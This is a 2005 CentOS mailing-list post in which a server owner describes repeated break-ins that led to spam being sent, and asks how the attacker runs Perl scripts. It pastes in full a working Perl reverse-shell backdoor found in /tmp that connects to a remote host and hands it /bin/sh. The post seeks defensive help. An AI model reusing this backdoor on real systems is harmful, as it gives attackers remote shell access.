[CentOS] Apache/PHP Security Help.

Ajay Sharma ssharma at revsharecorp.com
Wed Nov 30 08:29:04 UTC 2005


I have a personal apache/mail server that is getting hacked and I'm not 
sure how the person is getting in.  What's happening is that every few 
days, the below script will show up in /tmp as 'dc.txt', owned by apache 
and then a TON of mail is queued up to a bunch of addresses in 
@uol.com.br.

I initially thought they got in becuase I had an outdated version of 
'gallery' installed.  I rebuild the server and update gallery and 
thought I should be okay.  But now they are still getting in and instead 
of blindly rebuilding the server, I need to figure out how they are able 
to run perl scripts on the server.

Any suggestions?

--Ajay

PS.  This is a CentOS 4.2 box running the latest apache/php RPMS.

---------------------------
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
   printf "Usage: $0 [Host] <Port>\n";
   exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
   $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
   die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
   open(STDIN,">&SERVER");
   open(STDOUT,">&SERVER");
   open(STDERR,">&SERVER");
   exec {'/bin/sh'} '-bash' . "\0" x 4;
   exit(0);
}
print "[*] Datached\n\n";
--------------------------------



More information about the CentOS mailing list